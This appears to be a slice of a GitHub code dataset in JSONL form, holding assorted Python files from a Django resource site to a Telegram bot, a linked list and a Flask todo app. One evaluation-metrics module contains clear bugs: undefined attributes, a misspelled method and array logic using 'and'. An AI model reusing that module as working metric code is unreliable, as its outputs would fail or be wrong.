1], [10, 0], [10, 1]]) ➞ True\n \n on_rectangle_bounds([[0, 1]]) ➞ True\n\n### Notes\n\nOnly rectangles with sides parallel to _x-axis_ and _y-axis_ will be\nconsidered.\n\n\"\"\"\r\n\ndef on_rectangle_bounds(points):\n x0 = min(p[0] for p in points)\n x1 = max(p[0] for p in points)\n y0 = min(p[1] for p in points)\n y1 = max(p[1] for p in points)\n return all( ((x == x0 or x == x1) and (y >= y0 and y <= y1)) or \\\n ((y == y0 or y == y1) and (x >= x0 and x <= x1)) \\\n for x, y in points )\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"2iQhC3t4SDZ6LGMWw_24.py","file_name":"2iQhC3t4SDZ6LGMWw_24.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10936257467","text":"withdraw = int(input('Insert how much money do you want to withdraw: R$'))\ntotal = withdraw\nc = 0\nnotes = 50\nwhile True:\n if total >= notes:\n total -= notes\n c += 1\n else:\n if c > 0:\n print(f'Total of {c} notes of R${notes},00')\n if notes == 50:\n notes = 20\n elif notes == 20:\n notes = 10\n elif notes == 10:\n notes = 1\n c = 0\n if total == 0:\n break\nprint('----------- END ----------')\n","repo_name":"PatrickAMenezes/PyExercises-CeV","sub_path":"Mundo2/ex 35.py","file_name":"ex 35.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"23497562264","text":"# Ejercicio 1\n\n# Mejora la implementación del código facilitado en interrupcionEdge.py para que no ocurran los problemas\n# descritos del mismo. Al fichero resultante denomínalo interrupcionEdgeBueno.py\n\n#!/usr/bin/env python3\n\nimport RPi.GPIO as GPIO\nimport time\n\npulsadorGPIO = 16\n\nif __name__ == '__main__':\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(pulsadorGPIO, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n\n while True:\n GPIO.wait_for_edge(pulsadorGPIO, GPIO.RISING)\n print(\"El boton se ha pulsado\")\n time.sleep(0.1)\n\n# La solución a este ejercicio es muy sencilla: Al ejecutar el programa me he percatado de que se\n# muestra más de una vez el mensaje de pulsado cuando realmente solo he pulsado el botón una vez.\n# Para ello, lo único que he modificado del programa original es que a la última línea del programa,\n# dentro del bucle infinito, le he añadido un sistema antirebote (mencionado así en el enunciado de esta\n# práctica), que consiste en un time.sleep(0.1), ya que cuanto menor es la frecuencia, mayor será el\n# alivio para el procesador, y por tanto, evitaremos saturarlo.\n","repo_name":"aleon2020/SYA_2022-2023","sub_path":"Prácticas/Práctica 3: Uso de interrupciones para leer valores de un sensor/src/interrupcionEdgeBueno.py","file_name":"interrupcionEdgeBueno.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16596391375","text":"'''\nAdapted from https://github.com/naver/oasis/blob/master/image_helpers.py\n'''\n\nimport os\n\nimport numpy as np\n\nfrom PIL import Image\nfrom PIL import ImageDraw\nfrom PIL import ImageFont\n\n\nclass ImageOps:\n\tdef __init__(self):\n\n\t\tself.IMG_MEAN = np.array((104.00698793, 116.66876762, 122.67891434), dtype=np.float32)\n\n\t\tself.LABELS_DICT = {0:\"road\",\n\t\t\t\t\t\t\t1:\"sidewalk\",\n\t\t\t\t\t\t\t2:\"building\",\n\t\t\t\t\t\t\t3:\"wall\",\n\t\t\t\t\t\t\t4:\"fence\",\n\t\t\t\t\t\t\t5:\"pole\",\n\t\t\t\t\t\t\t6:\"light\",\n\t\t\t\t\t\t\t7:\"sign\",\n\t\t\t\t\t\t\t8:\"vegetation\",\n\t\t\t\t\t\t\t9:\"terrain\",\n\t\t\t\t\t\t\t10:\"sky\",\n\t\t\t\t\t\t\t11:\"person\",\n\t\t\t\t\t\t\t12:\"rider\",\n\t\t\t\t\t\t\t13:\"car\",\n\t\t\t\t\t\t\t14:\"truck\",\n\t\t\t\t\t\t\t15:\"bus\",\n\t\t\t\t\t\t\t16:\"train\",\n\t\t\t\t\t\t\t17:\"motocycle\",\n\t\t\t\t\t\t\t18:\"bicycle\"\n\t\t\t\t\t\t\t}\n\n\t\tself.PALETTE = [128, 64, 128, 244, 35, 232, 70, 70, 70, 102, 102, 156, 190, 153, 153, 153, 153, 153, 250, 170, 30,\n\t\t\t\t\t\t220, 220, 0, 107, 142, 35, 152, 251, 152, 70, 130, 180, 220, 20, 60, 255, 0, 0, 0, 0, 142, 0, 0, 70,\n\t\t\t\t\t\t0, 60, 100, 0, 80, 100, 0, 0, 230, 119, 11, 32] # 19x3 values, for Image's palette() module\n\n\t\tzero_pad = 256 * 3 - len(self.PALETTE)\n\t\tfor i in range(zero_pad):\n\t\t\tself.PALETTE.append(0)\n\n\tdef colorize_mask(self, mask):\n\t\t# mask: numpy array of the mask\n\t\tnew_mask = Image.fromarray(mask.astype(np.uint8)).convert('P')\n\t\tnew_mask.putpalette(self.PALETTE)\n\t\treturn new_mask\n\n\n\tdef get_concat_h(self, im1, im2):\n\t\tdst = Image.new('RGB', (im1.width + im2.width, max(im1.height, im2.height)))\n\t\tdst.paste(im1, (0, 0))\n\t\tdst.paste(im2, (im1.width, 0))\n\t\treturn dst\n\n\n\tdef get_concat_v(self, im1, im2):\n\t\tdst = Image.new('RGB', (max(im1.width, im2.width), im1.height + im2.height))\n\t\tdst.paste(im1, (0, 0))\n\t\tdst.paste(im2, (0, im1.height))\n\t\treturn dst\n\n\n\tdef process_image_for_saving(self, image, interp=None):\n\n\t\t# handling RGB input image\n# \t\timage = interp(image).cpu().numpy().squeeze()\n# \t\timage = np.transpose(image, (1, 2, 0))\n# \t\timage += self.IMG_MEAN\n# \t\timage = image[:, :, ::-1]\n\t\timage = image.astype(np.uint8)\n\t\timage = Image.fromarray(image)\n\t\treturn image\n\n\n\tdef process_rescaled_image_for_saving(self, image, mean, std):\n\n\t\t# handling RGB input image\n\t\timage = image.cpu().numpy().squeeze()\n\t\timage = np.transpose(image, (1, 2, 0))\n\t\timage *= std\n\t\timage += mean\n\t\timage *= 255.\n\t\t#image = image[:, :, ::-1]\n\t\timage = image.astype(np.uint8)\n\t\treturn image\n\n\n\tdef save_concat_image(self, image, gt, pred, unc_map, save_path, image_name):\n\n\t\t\"\"\"\n\t\tSave concatenation of image, ground truth and prediction\n\t\t\"\"\"\n\n\t\timage_concat = self.get_concat_v(image, pred)\n\t\timage_concat = self.get_concat_v(gt, image_concat)\n\t\tunc_map = np.stack(\n\t\t\t\t(unc_map, np.zeros_like(unc_map), np.zeros_like(unc_map)),\n\t\t\t\taxis=2)\n\t\tunc_map_on_img = (0.4*np.array(image) + 0.6*unc_map).astype(np.uint8)\n\t\tunc_map_on_img = Image.fromarray(unc_map_on_img)\n\t\timage_concat = self.get_concat_v(image_concat, unc_map_on_img)\n\t\timage_concat_path = os.path.join(save_path, image_name)\n\t\timage_concat.save(image_concat_path)\n","repo_name":"naver/relis","sub_path":"image_helpers.py","file_name":"image_helpers.py","file_ext":"py","file_size_in_byte":2939,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"32"} +{"seq_id":"7839338656","text":"'''\nAuthor: yitong 2969413251@qq.com\nDate: 2023-02-22 15:57:59\n'''\nimport numpy as np\nimport abc\nfrom ..core import Node\n\n\nclass Metrics(Node):\n \"\"\"evaluation metric operator abstract base class\"\"\"\n\n def __init__(self, *parents, **kargs):\n # by default, the metrics node does not need to be saved in distributed training\n kargs['need_save'] = kargs.get('need_save', False)\n Node.__init__(self, *parents, **kargs)\n\n # initilze the node\n self.init()\n\n def reset(self):\n self.reset_value()\n self.init()\n\n @abc.abstractmethod\n def init(self):\n # the initlization node is implemented by concreted subclasses\n pass\n\n def get_jacobi(self):\n # we don't need to compute the jacobi for the metric nodes\n raise NotImplementedError()\n\n # it is convenient for its subclasses to call\n @staticmethod\n def prob_to_label(prob, thresholds=0.5):\n if prob.shape[0] > 1:\n # if it is multi-classification node, we need the category with the highest probability\n labels = np.argmax(prob, axis=0)\n else:\n # or decide the category based on the threshold\n labels = np.where(prob < thresholds, 0, 1)\n return labels\n\n\nclass Accuracy(Metrics):\n \"\"\"accuracy node\"\"\"\n\n def __init__(self, *parents, **kargs):\n Metrics.__init__(self, *parents, **kargs)\n\n def init(self):\n self.correct_num = 0\n self.total_num = 0\n\n def compute(self):\n \"\"\"\n compute ‘accuracy’: (TP + TN) / TOTAL\n we assume that the first parent node is the predicted value (probability), the second node is label\n \"\"\"\n pred = Metrics.prob_to_label(self.parents[0].value)\n gt = self.parents[1].value\n\n # the number of samples that predict correctly\n self.correct_num += np.sum(pred == gt)\n\n # the total number of samples\n self.total += len(pred)\n self.value = 0\n if self.total_num != 0:\n self.value = float(self.correct_num) / self.total_num\n\n\nclass Precision(Metrics):\n \"\"\"Precision metric\n to evaluate the positive samples that predict correctly\n \"\"\"\n\n def __init__(self, *parents, **kargs):\n Metrics.__init__(self, *parents, **kargs)\n\n def init(self):\n self.true_pos_num = 0\n self.pred_pos_num = 0\n\n def compute(self):\n \"\"\"compute precision: TP / (TP + FP)\"\"\"\n pred = Metrics.prob_to_label(self.parents[0].value)\n gt = self.parents[1].value\n\n # the number of samples predicted to be 1\n self.pred_pos_num += np.sum(pred == 1)\n\n # the number of samples predicted to be 1 and predicted correctly\n self.true_pos_num += np.sum(pred == gt and pred == 1)\n\n self.value = 0\n if self.pred_pos_num != 0:\n self.value = float(self.true_pos_num) / self.pred_pos_num\n\n\nclass Recall(Metrics):\n \"\"\"Recall node\"\"\"\n\n def __init__(self, *parents, **kargs):\n Metrics.__init__(self, *parents, **kargs)\n\n def init(self):\n self.gt_pos_num = 0\n self.true_pos_num = 0\n\n def compue(self):\n \"\"\"compute recall: TP / (TP + FN)\"\"\"\n pred = Metrics.prob_to_label(self.parents[0].value)\n gt = self.parents[1].value\n\n # the number of samples predicted to be 1\n self.get_pos_number += np.sum(gt == 1)\n\n # the number of smaples predicted to be 1 and predicted correctly\n self.gt_pos_number += np.sum(pred == gt and gt == 1)\n\n self.value = 0\n if self.gt_pos_num != 0:\n self.value = float(self.true_pos_num) / self.gt_pos_num\n\n\nclass ROC(Metrics):\n \"\"\"ROC curve\"\"\"\n\n def __init__(self, *parents, **kargs):\n Metrics.__init__(self, *parents, **kargs)\n\n def init(self):\n self.count = 100\n self.gt_pos_num = 0\n self.gt_neg_num = 0\n self.true_pos_num = np.array([0] * self.count)\n self.false_pos_num = np.array([0] * self.count)\n self.tpr = np.array([0] * self.count)\n self.fpr = np.array([0] * self.count)\n\n def compute(self):\n\n prob = self.parents[0].value\n gt = self.parents[1].value\n self.gt_pos_num += np.sum(gt == 1)\n self.gt_neg_num += np.sum(gt == -1)\n\n # the minimum is 0.01, the maximum is 0.99, step is 0.0.1 to generate 99 threshold\n thresholds = list(np.arange(0.01, 1.00, 0.01))\n\n # use respectively serveral thresholds to generate category prediction and compare them to labels\n for index in range(0, len(thresholds)):\n pred = Metrics.prob_to_label(prob, thresholds[index])\n self.true_pos_num[index] += np.sum(pred == gt and pred == 1)\n self.false_pos_num[index] += np.sum(pred != gt and pred == 1)\n\n # compute TPR and FPR respectively\n if self.get_pos_num != 0 and self.gt_neg_num != 0:\n self.tpr = self.true_pos_num / self.gt_pos_num\n self.fpr = self.false_pos_num / self.gt_neg_num\n\n\nclass ROC_AUC(Metrics):\n \"\"\"ROC AUC\"\"\"\n\n def __init__(self, *parents, **kargs):\n Metrics.__init__(self, *parents, **kargs)\n\n def init(self):\n self.gt_pos_preds = []\n self.gt_neg_preds = []\n\n def compute(self):\n prob = self.parents[0].value\n gt = self.parents[1].value\n\n assert prob.shape == gt.shape\n\n rows, cols = prob.shape\n\n for i in range(rows):\n for j in range(cols):\n if gt[i, j] == 1:\n self.gt_pos_preds.append(prob[i, j])\n else:\n self.gt_neg_preds.append(prob[i, j])\n self.total = len(self.gt_pos_preds) * len(self.gt_neg_preds)\n\n def value_str(self):\n count = 0\n\n # iterate m * n sample pairs, calculcate the number of positive probabilities greater than negative probabilties\n for gt_pos_pred in self.gt_pos_preds:\n for gt_neg_pred in self.gt_neg_preds:\n if gt_pos_pred > gt_neg_pred:\n count += 1\n\n self.value = float(count) / self.total\n\n return f\"{self.__class__.__name__}: {self.value:.4f}\"\n","repo_name":"minleminzui/py_dl","sub_path":"py_dl/ops/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":6146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5456469323","text":"\"\"\"\n\n This module cointains the controller aspect of MVC\n for this Django application\n\n\"\"\"\nfrom django.contrib.auth import authenticate, login\nfrom django.core import serializers\nfrom django.db.models import Count\nfrom django.http import HttpResponseRedirect, JsonResponse\nfrom django.shortcuts import get_object_or_404, render\nfrom django.urls import reverse\nfrom .forms import TopicForm, CustomUserCreationForm, ResourceForm\nfrom .models import Topic, Resource, Votes\n\n\ndef index(request):\n \"\"\"\n\n This function is responsible for capturing the\n trending topics and displaying them on the index\n page of the site\n\n \"\"\"\n latest_topics = Topic.objects.all().annotate(\n resource_count=Count('resource')\n ).order_by('-resource_count')[:8]\n\n topic_form = TopicForm()\n context = {'latest_topics': latest_topics, 'topic_form': topic_form}\n return render(request, 'beres/index.html', context)\n\n\ndef detail(request, topic_id):\n \"\"\"\n\n This function is responsible for listing the Topic details.\n The detail will contain a listing of all of the corresponding resources\n\n \"\"\"\n\n topic = get_object_or_404(Topic, pk=topic_id)\n\n user_votes_by_resource_id = []\n\n if request.user.is_authenticated:\n user_votes_by_resource_id = Votes.objects.filter(\n user=request.user\n ).values_list('resource_id', flat=True)\n\n return render(\n request,\n 'beres/detail.html',\n {'topic': topic, 'user_votes': user_votes_by_resource_id}\n )\n\n\ndef new_topic(request):\n \"\"\"\n\n This function is responsible for creating a new topic\n\n \"\"\"\n if request.user.is_authenticated:\n if request.method == \"POST\":\n topic_form = TopicForm(request.POST)\n if topic_form.is_valid():\n name = request.POST['name']\n user = request.user\n topic = Topic(name=name, user=user)\n topic.save()\n return HttpResponseRedirect(reverse('beres:index'))\n else:\n topic_form = TopicForm()\n return render(\n request,\n 'beres/new_topic.html',\n {'topic_form': topic_form}\n )\n else:\n return HttpResponseRedirect(reverse('beres:index'))\n\n\ndef new_resource(request, topic_id):\n \"\"\"\n\n This function is responsible for rendering a new resource form\n\n \"\"\"\n\n if request.user.is_authenticated:\n form = ResourceForm()\n context = {'topic_id': topic_id, 'form': form}\n return render(request, 'beres/new_resource.html', context)\n\n return HttpResponseRedirect(reverse('beres:index'))\n\n\ndef save_resource(request, topic_id):\n \"\"\"\n\n This function is responsible for saving a new topic resource\n\n \"\"\"\n if request.user.is_authenticated:\n topic = get_object_or_404(Topic, pk=topic_id)\n form = ResourceForm(request.POST)\n if form.is_valid():\n try:\n url = request.POST['url']\n free = True if request.POST['free'] == 'Free' else False\n resource = Resource(\n topic=topic,\n url=url,\n free=free,\n user=request.user\n )\n resource.save()\n return HttpResponseRedirect(\n reverse('beres:detail', args=(topic.id,))\n )\n except Exception as e:\n return render(\n request,\n 'beres/new_resource.html',\n {'topic': topic, 'error_message': e}\n )\n else:\n return render(\n request,\n 'beres/new_resource.html',\n {'topic': topic, 'error_message': form.errors}\n )\n else:\n return HttpResponseRedirect(reverse('beres:index'))\n\n\ndef validate_topic_name(request):\n \"\"\"\n\n This function determines whether the entered topic name is valid. It does\n this by searching for any pre-existing records that contain the same name\n\n \"\"\"\n\n topic_name = request.GET.get('topic_name', None)\n data = {\n 'is_taken': Topic.objects.filter(name__iexact=topic_name).exists()\n }\n\n if data['is_taken']:\n data['error_message'] = 'A topic with this name already exists.'\n\n return JsonResponse(data)\n\n\ndef add_resource_vote(request):\n \"\"\"\n\n This function is responsible for adding user votes to a specified resource.\n A user can up-vote or down-vote a resource\n\n \"\"\"\n if request.user.is_authenticated:\n\n resource_id = request.GET.get('resource_id', None)\n resource = Resource.objects.get(pk=resource_id)\n vote_up = True if request.GET.get('vote_up', None) == \"true\" else False\n existing_vote = Votes.objects.filter(\n resource=resource,\n user=request.user\n )\n existing_vote_count = existing_vote.count()\n\n data = {}\n\n if existing_vote_count == 0:\n\n Votes.objects.create(\n resource=resource,\n user=request.user,\n voted_up=vote_up\n )\n\n elif existing_vote_count == 1:\n existing_vote.update(voted_up=vote_up)\n\n data['positive_votes'] = Votes.objects.filter(\n resource=resource,\n voted_up=True\n ).count()\n\n data['negative_votes'] = Votes.objects.filter(\n resource=resource,\n voted_up=False\n ).count()\n\n data['voted_up'] = vote_up\n\n return JsonResponse(data)\n\n\ndef search_topic_name(request):\n \"\"\"\n\n This function takes the current text that is entered into\n search and queries the database for any hits\n\n \"\"\"\n search_keyword = request.GET.get('search_topic_name', None)\n topics = serializers.serialize(\n \"json\",\n Topic.objects.filter(name__icontains=search_keyword)\n )\n\n data = {\n 'topics': topics\n }\n return JsonResponse(data)\n\n\ndef contact_us(request):\n \"\"\"\n\n This renders the contact us page\n\n \"\"\"\n return render(request, 'beres/contact_us.html')\n\n\ndef about_us(request):\n \"\"\"\n\n This renders the about us page\n\n \"\"\"\n return render(request, 'beres/about_us.html')\n\n\ndef register(request):\n \"\"\"\n\n This function is responsibile for registering new users\n\n \"\"\"\n if request.method == 'POST':\n form = CustomUserCreationForm(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data.get('username')\n raw_password = form.cleaned_data.get('password1')\n user = authenticate(username=username, password=raw_password)\n login(request, user)\n return HttpResponseRedirect('/beres')\n else:\n form = CustomUserCreationForm()\n return render(request, 'registration/register.html', {'form': form})\n","repo_name":"josephlane/beres","sub_path":"beres/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6914,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"39573540265","text":"from os import path\nimport json\n\nsource_file_name = path.join(\"data\", \"task_5_7_data.txt\")\ntarget_file_name = path.join(\"data\", \"task_5_7_res.json\")\ncompanies_dict = dict()\n\ntry:\n\twith open(source_file_name, mode='r', encoding='utf-8') as file:\n\t\tfor line in file:\n\t\t\tcompanies_dict[line.split()[0]] = (tuple(line.split()[1:4]))\n\nexcept FileNotFoundError:\n\tprint(f\"File {source_file_name} was not found!\")\n\nprofit_dict = dict()\npositive_profit_cnt, positive_profit_sum = 0, 0\n\nfor comp, data in companies_dict.items():\n\tprofit = float(data[1]) - float(data[2])\n\tprofit_dict[comp] = profit\n\tif profit > 0:\n\t\tpositive_profit_cnt += 1\n\t\tpositive_profit_sum += profit\n\navg_profit = {\"average_profit\": positive_profit_sum / positive_profit_cnt}\n\noutput_list = [profit_dict, avg_profit]\n\nwith open(target_file_name, mode='w', encoding='utf-8') as file:\n\tjson.dump(output_list, file, indent=4, ensure_ascii=False)\n","repo_name":"Regbit/gb_python","sub_path":"lesson-5/task_5_7.py","file_name":"task_5_7.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"795826429","text":"import asyncio\nimport logging\nfrom aiogram.types import CallbackQuery\nfrom aiogram.utils.formatting import as_list, as_marked_section, Bold\nfrom aiogram.utils.keyboard import InlineKeyboardBuilder\n\nfrom diploma_task_parser.management.commands.keyboards.topics import get_inline_keyboard_rating\nfrom diploma_task_parser.models import Topic, Task\n\n\nasync def select_topics(call: CallbackQuery):\n try:\n loop = asyncio.get_event_loop()\n topics = await loop.run_in_executor(None, get_inline_keyboard)\n await call.message.answer(f'====='\n f'\\nТемы:'\n f'\\n=====',\n reply_markup=topics)\n await call.answer()\n except Exception as e:\n logging.error(f\"Error in select_topics: {e}\")\n\n\ndef get_topics():\n topics = []\n for i in Topic.objects.all():\n topics.append(i.name)\n return '\\n'.join(topics)\n\n\ndef get_inline_keyboard():\n topics = get_topics()\n\n keyboard_builder = InlineKeyboardBuilder()\n\n for i in topics.split('\\n'):\n if i.find(' '):\n keyboard_builder.button(text=i, callback_data=i)\n else:\n keyboard_builder.button(text=i, callback_data=i)\n\n keyboard_builder.adjust(3)\n return keyboard_builder.as_markup()\n\n\nasync def get_rating(call: CallbackQuery):\n await call.message.answer(\n f'Выберите рейтинг задачи: ',\n reply_markup=get_inline_keyboard_rating()\n )\n await call.answer()\n\n\nasync def select_task(call: CallbackQuery):\n topic = call.data\n\n try:\n loop = asyncio.get_event_loop()\n answer = await loop.run_in_executor(None, get_tasks, topic)\n\n answer_list = answer.split('\\n\\n')\n content = as_list(\n as_marked_section(\n Bold(\n f'Вы выбрали тему: \"{topic}\"'\n f'\\nТоп решаемых задач по этой теме:'\n ),\n answer_list[0],\n answer_list[1],\n answer_list[2],\n marker=\"\\n✅ \",\n ),\n )\n await call.message.answer(**content.as_kwargs())\n await call.answer(\n text=\"Спасибо, что воспользовались моим ботом!\",\n show_alert=True\n )\n except Exception as e:\n logging.error(f\"Error in select_topics: {e}\")\n\n\ndef get_tasks(topic):\n topic = Topic.objects.get(name=topic)\n tasks = []\n for i in Task.objects.all().filter(category=topic.id).order_by('-solved_count')[:3]:\n tasks.append(i.__str__())\n return '\\n\\n'.join(tasks)\n","repo_name":"Bonyfacci/my_project","sub_path":"diploma_task_parser/management/commands/handlers/callback.py","file_name":"callback.py","file_ext":"py","file_size_in_byte":2708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"808227336","text":"\n# importing pandas as pd\nimport pandas as pd\nfrom IPython.display import HTML\n \n# creating the dataframe\ndf = pd.read_csv('cities.csv')\n \nhtml = df.to_html()\n \n# write html to file\ntext_file = open(\"csvdata.html\", \"w\")\ntext_file.write(html)\ntext_file.close()","repo_name":"kimaprice/weather-equator","sub_path":"Resources/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18953617040","text":"class node:\n \n def __init__(self, value):\n self.data = value #we will pass the value here\n self.next = None # we will keep default adress as none when creating a node\n \n \nclass ll:\n \n def __init__(self): # here we are creating an empty linked list\n \n self.head = None\n self.n = 0 # keeps count of the number of nodes \n \n def __len__(self): # len of linked list is the number of nodes \n return self.n\n \n def insert_at_head(self, value):\n \n # create node\n new_node = node(value)\n \n #create connection\n new_node.next = self.head\n \n #reassign head\n self.head = new_node\n \n #increment n\n self.n += 1\n \n def traverse(self):\n \n cur = self.head\n \n while cur != None:\n \n print(cur.data)\n cur = cur.next\n \n def apppend(self, value):\n \n new_node = node(value)\n \n if self.head == None: #if wmpty ll then we make the new node itself as head\n # empty LL\n self.head = new_node\n self.n += 1\n return \n \n cur = self.head\n \n while cur.next != None:\n \n cur = cur.next\n \n #now at this point u are at the last node \n cur.next = new_node # this appending works when ll is not empty\n self.n += 1\n \n \n def insert_after(self, after, value): # for inserting after the particular element\n new_node = node(value) # first create a node\n \n cur = self.head\n \n while cur != None: # till it reaches the last element pull a loop\n if cur.data == after: # if item found then break the loop\n break\n \n cur = cur.next # continue finding\n \n \n if cur != None: # if the element is found in the ll then insert ht enew node\n new_node.next = cur.next\n cur.next = new_node\n self.n += 1\n \n\n else: #if not found in the ll\n print(\"not found\")\n return\n # case 1 break -> after is found\n # case 2 -> item is not found -> cur -> None\n \n print(cur.data)\n \n \n \n \n \nl = ll()\nl.insert_at_head(1)\nl.insert_at_head(2)\nl.insert_at_head(3)\nl.insert_at_head(4)\n\nl.insert_after(20, 200)\n\nprint(l.traverse())\n\n# print(\"-----------\")\n# l.apppend(5)\n# print(len(l))\n# print(l.traverse())\n\n\n","repo_name":"ANURAG-R-NAIK/LINKED-LISTS","sub_path":"insert middle.py","file_name":"insert middle.py","file_ext":"py","file_size_in_byte":2611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41444384057","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\n\nimport motmetrics as mm\n\nif __name__ == '__main__':\n\n # Create an accumulator that will be updated during each frame\n acc = mm.MOTAccumulator(auto_id=True)\n\n # Each frame a list of ground truth object / hypotheses ids and pairwise distances\n # is passed to the accumulator. For now assume that the distance matrix given to us.\n\n # 2 Matches, 1 False alarm\n acc.update(\n [1, 2], # Ground truth objects in this frame\n [1, 2, 3], # Detector hypotheses in this frame\n [[0.1, np.nan, 0.3], # Distances from object 1 to hypotheses 1, 2, 3\n [0.5, 0.2, 0.3]] # Distances from object 2 to hypotheses 1, 2,\n )\n print(acc.events)\n\n # 1 Match, 1 Miss\n df = acc.update(\n [1, 2],\n [1],\n [[0.2], [0.4]]\n )\n print(df)\n\n # 1 Match, 1 Switch\n df = acc.update(\n [1, 2],\n [1, 3],\n [[0.6, 0.2],\n [0.1, 0.6]]\n )\n print(df)\n\n # Compute metrics\n\n mh = mm.metrics.create()\n summary = mh.compute(acc, metrics=['num_frames', 'mota', 'motp'], name='acc')\n print(summary)\n\n summary = mh.compute_many(\n [acc, acc.events.loc[0:1]],\n metrics=['num_frames', 'mota', 'motp'],\n names=['full', 'part'])\n print(summary)\n\n strsummary = mm.io.render_summary(\n summary,\n formatters={'mota': '{:.2%}'.format},\n namemap={'mota': 'MOTA', 'motp': 'MOTP'}\n )\n print(strsummary)\n\n summary = mh.compute_many(\n [acc, acc.events.loc[0:1]],\n metrics=mm.metrics.motchallenge_metrics,\n names=['full', 'part'])\n strsummary = mm.io.render_summary(\n summary,\n formatters=mh.formatters,\n namemap=mm.io.motchallenge_metric_names\n )\n print(strsummary)\n","repo_name":"cheind/py-motmetrics","sub_path":"motmetrics/apps/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","stars":1269,"dataset":"github-code","pt":"32"} +{"seq_id":"27061021399","text":"import pandas as pd\r\nimport os\r\n\r\nfile = r'12_screen.csv'\r\nwith open(file, 'r') as f:\r\n data = pd.read_csv(f)\r\n\r\nfor i in data.index:\r\n box1 = data.at[i, 'Upstream Box']\r\n if str(data.at[i, 'up_seq_trio']) == 'nan':\r\n spacer = ''\r\n else:\r\n spacer = data.at[i, 'up_seq_trio']\r\n trio = data.at[i, 'DnaA-trio']\r\n\r\n all_seq = box1 + spacer + trio\r\n\r\n data.at[i, 'predicted sequence'] = all_seq\r\n\r\ndata.rename(\r\n columns={'predicted sequence': 'Predicted BUS sequences'}, inplace=True)\r\ndata.rename(columns={'Upstream Box': 'Upstream DnaA-box'}, inplace=True)\r\ndata.rename(\r\n columns={'seq_between_box': 'Sequence between two DnaA-boxes'}, inplace=True)\r\ndata.rename(columns={'Downstream Box': 'Downstream DnaA-box'}, inplace=True)\r\ndata.rename(columns={'trio score': 'The score of DnaA-trios'}, inplace=True)\r\ndata.rename(\r\n columns={'the number of trio': 'The number of DnaA-trios'}, inplace=True)\r\ndata.rename(\r\n columns={'box motif': 'The standard motif of DnaA-box'}, inplace=True)\r\ndata.rename(\r\n columns={'Upstream mismatch': 'The mismatch of upstream DnaA-box'}, inplace=True)\r\ndata.rename(columns={\r\n 'Downstream mismatch': 'The mismatch of downstream DnaA-box'}, inplace=True)\r\ndata.rename(\r\n columns={'GC-rich region': 'Gap region (previous GC-rich region)'}, inplace=True)\r\ndata.rename(\r\n columns={'coserved spacer len': 'The length of spacer'}, inplace=True)\r\n\r\n\r\ndata = data[['Accession Number', 'DoriC AC', 'Predicted BUS sequences', 'Upstream DnaA-box', 'Downstream DnaA-box', 'DnaA-trio', 'The score of DnaA-trios', 'The number of DnaA-trios',\r\n 'The standard motif of DnaA-box', 'The mismatch of upstream DnaA-box', 'The mismatch of downstream DnaA-box', 'Gap region (previous GC-rich region)', 'The length of spacer']]\r\n\r\nos.remove('1_search_standard_box_spacer_0_16_greedy.csv')\r\nos.remove('2_search_specific_box_spacer_0_16_greedy.csv')\r\nos.remove('3_search_Epsilonproteobacteria_box_spacer_0_16_greedy.csv')\r\nos.remove('4_concat_delete_repeat.csv')\r\nos.remove('5_box1_box2.csv')\r\nos.remove('6_search_upstream_box.csv')\r\nos.remove('7_adjust_box.csv')\r\nos.remove('8_calculate_spacer_len.csv')\r\nos.remove('9_adjust_box_mismatch.csv')\r\nos.remove('10_minmismatch_newspacer.csv')\r\nos.remove('11_score_trio.csv')\r\nos.remove('12_screen.csv')\r\n\r\n\r\ndata.to_csv('DnaA_trios.csv', index=False)\r\n","repo_name":"DongMeiJing/DnaA-trios","sub_path":"Search_DnaA_trios/14_connect_seq.py","file_name":"14_connect_seq.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8728195358","text":"from flask import Flask,render_template,request,url_for,redirect,jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate\nimport sys\n\nfrom sqlalchemy.orm import backref\n\napp=Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql:///db1'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS']=False\ndb=SQLAlchemy(app)\nmigrate=Migrate(app,db)\n\nclass Todo(db.Model):\n id = db.Column(db.Integer , primary_key=True)\n description = db.Column(db.String, nullable=False)\n completed = db.Column(db.Boolean, default=False)\n list_id = db.Column(db.Integer , db.ForeignKey('todo_list.id'),nullable=False)\n def __repr__(self):\n return f''\n\nclass TodoList(db.Model):\n id = db.Column(db.Integer , primary_key=True)\n name = db.Column(db.String, nullable=False)\n todos = db.relationship('Todo', backref='list')\n\n@app.route('/')\ndef index():\n return 